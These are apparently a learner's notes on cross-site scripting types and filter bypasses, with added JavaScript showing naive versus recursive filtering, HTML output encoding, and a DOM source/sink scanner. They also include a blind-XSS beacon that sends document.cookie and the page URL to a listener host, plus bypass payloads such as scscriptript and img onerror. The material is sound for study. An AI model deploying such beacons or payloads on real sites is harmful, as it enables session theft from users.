Section - Cross-site Scripting

Notes:

  • Types:
    • Reflected XSS - User-provided data in a request (URL parameter, form field, header) is echoed straight back into the response without proper validation/output encoding, so the payload runs when a victim opens a crafted link.
    • Stored XSS - Malicious comments, profile fields, etc. that are saved in the website’s database and rendered to other users, in whose browsers the payload executes.
      • Good example: someone posts a comment on a forum, the comment contains a payload that isn’t filtered/encoded, and it fires for everyone who views the thread.
    • DOM Based XSS - The bug is in the page’s own client-side JS: it takes data from a source the attacker controls (location.hash, location.search, document.referrer, window.name, postMessage) and writes it into a sink that turns strings into markup or code. The payload may never reach the server, so server-side filters and logs don’t see it.
      • Takes a fair amount of JS reading: trace what the page pulls in from the browser and where it ends up.
      • eval() is a prime sink to look for (so are innerHTML, document.write, and location assignments).
    • Blind XSS - Very similar to stored XSS, except you can’t observe the execution: the payload fires in a context you never see, so the payload itself has to report back.
      • Ex: A support chat/ticket system doesn’t validate your ticket content, and the payload runs in the agent’s dashboard when they open it
      • THM recommended the tool XSS Hunter (xsshunter)
  • Work out which words an XSS filter strips and whether it only does a single pass; can you trick it? Probably.
    • Ex: “script” is removed once, so scscriptript has its middle stripped and the halves rejoin as script. Also try case variation (ScRiPt) and tags/handlers that never use the word at all (img onerror, svg onload).
  • Polyglots
    • A single payload crafted to work in several injection contexts at once (HTML body, inside an attribute, inside a JS string) and to slip past common filters; a one-size-fits-all first probe.
  • Netcat is your friend for potential blind XSS: start a listener (nc -lvnp 4444) and have the payload fetch() your machine’s URL from the victim’s browser. If a request shows up on the listener, nice, it executed. Put location.href (and document.cookie, though HttpOnly cookies won’t be included) in the query string so the hit tells you where it fired.
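Added example for the filter-bypass and blind-XSS bullets above (my code, not from the THM material): the single-pass “strip script” filter beside the recursive fix and proper output encoding, plus a beacon payload builder. The listener URL 10.10.14.5:4444 is a placeholder for your own box.

```javascript
// Added example, not from the original notes: the "strip the word script"
// filter, the recursive fix, proper output encoding, and a blind-XSS beacon.
// Run with: node xss_filters.js

// Naive blocklist: removes "script" exactly once per occurrence.
// "scscriptript" loses its middle "script" and the halves rejoin as "script".
function naiveStrip(input) {
  return input.replace(/script/gi, '');
}

// Stripping until the string stops changing closes that specific hole,
// but it is still a blocklist: a payload that never says "script"
// (e.g. <img src=x onerror=alert(1)>) walks straight through.
function recursiveStrip(input) {
  let prev;
  do {
    prev = input;
    input = input.replace(/script/gi, '');
  } while (input !== prev);
  return input;
}

// The real fix for reflected/stored XSS in an HTML text context: encode on
// output so nothing the user sent can become markup. (Attribute and JS
// contexts need their own encoders; this one is for element content only.)
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function htmlEncode(input) {
  return input.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Blind XSS beacon: you cannot watch the payload run, so make it phone home.
// `listener` is a hypothetical URL for your machine, where
//   nc -lvnp 4444
// is waiting. The raw GET that lands there proves execution and carries the
// victim's page URL and any non-HttpOnly cookies in the query string.
function blindBeacon(listener) {
  const base = new URL(listener).href; // throws early on a malformed URL
  const js = `fetch(${JSON.stringify(base)}+'?l='+encodeURIComponent(location.href)` +
             `+'&c='+encodeURIComponent(document.cookie),{mode:'no-cors'})`;
  return `<script>${js}</script>`;
}

// Demo against the note's bypass string.
const bypass = '<scscriptript>alert(1)</scscriptript>';
console.log('naive     :', naiveStrip(bypass));
console.log('recursive :', recursiveStrip(bypass));
console.log('encoded   :', htmlEncode(naiveStrip(bypass)));
console.log('beacon    :', blindBeacon('http://10.10.14.5:4444/'));
```

The takeaway is in the second function: even the recursive strip still passes the `img onerror` payload untouched, because a blocklist only ever knows the strings it was told about; encoding on output is what actually closes the class of bug. `mode:'no-cors'` keeps the browser from blocking the beacon on a missing CORS header, which netcat will never send.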
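Added example for the DOM-based XSS bullet (my code, not from THM): a rough source/sink grep over a page’s JavaScript to speed up the “what is this page pulling from the browser?” step. The sample script it scans is constructed for the demo, not taken from any real site, and the scanner is a triage aid, not a taint tracker: every hit still needs reading.

```javascript
// Added example, not from the original notes: source/sink triage for DOM XSS.
// Run with: node dom_sinks.js

// Places untrusted data enters client-side code.
const SOURCES = [
  'location.hash', 'location.search', 'location.href', 'document.URL',
  'document.referrer', 'window.name', 'postMessage', 'localStorage',
];

// Places where a string becomes markup or code. setTimeout/setInterval only
// count when handed a string, so expect some false positives there.
const SINKS = [
  'innerHTML', 'outerHTML', 'insertAdjacentHTML', 'document.write',
  'eval', 'Function(', 'setTimeout', 'setInterval', '.html(', 'srcdoc',
];

// Returns one entry per line that mentions a source or a sink.
function findDomXssCandidates(jsText) {
  const hits = [];
  jsText.split('\n').forEach((line, i) => {
    const sources = SOURCES.filter((s) => line.includes(s));
    const sinks = SINKS.filter((s) => line.includes(s));
    if (sources.length || sinks.length) {
      hits.push({ line: i + 1, sources, sinks, text: line.trim() });
    }
  });
  return hits;
}

// Data usually travels from a source line to a sink line through a variable,
// so pair them: remember identifiers assigned on source lines, then flag sink
// lines that use one of them. Crude (no scoping, no reassignment tracking),
// but it orders the hits by how worrying they are.
function linkSourcesToSinks(hits) {
  const tainted = new Map(); // identifier -> line it was assigned from a source
  const flows = [];
  for (const h of hits) {
    const decl = h.text.match(/^(?:const|let|var)?\s*([A-Za-z_$][\w$]*)\s*=/);
    if (h.sources.length && decl) tainted.set(decl[1], h.line);
    if (h.sinks.length) {
      for (const [name, srcLine] of tainted) {
        if (new RegExp(`\\b${name}\\b`).test(h.text)) {
          flows.push({ from: srcLine, to: h.line, via: name });
        }
      }
    }
  }
  return flows;
}

// Constructed sample page script (not from any real site).
const SAMPLE = [
  "const q = decodeURIComponent(location.hash.slice(1));",
  "document.getElementById('greeting').innerHTML = 'Hello ' + q;",
  "const cfg = JSON.parse(window.name);",
  "eval(cfg.callback);",
  "el.textContent = location.search;",
].join('\n');

const hits = findDomXssCandidates(SAMPLE);
const flows = linkSourcesToSinks(hits);
for (const h of hits) console.log(`${h.line}: sources=[${h.sources}] sinks=[${h.sinks}]`);
for (const f of flows) console.log(`line ${f.from} -> line ${f.to} via ${f.via}`);
```

On the sample this reports two flows: `location.hash` into `innerHTML` via `q` (the classic `#<img src=x onerror=...>` case) and `window.name` into `eval` via `cfg`. Line 5 reads `location.search` but writes it to `textContent`, which is not a sink, so it shows up as a source hit with no flow; that is the kind of line you skip on a first pass.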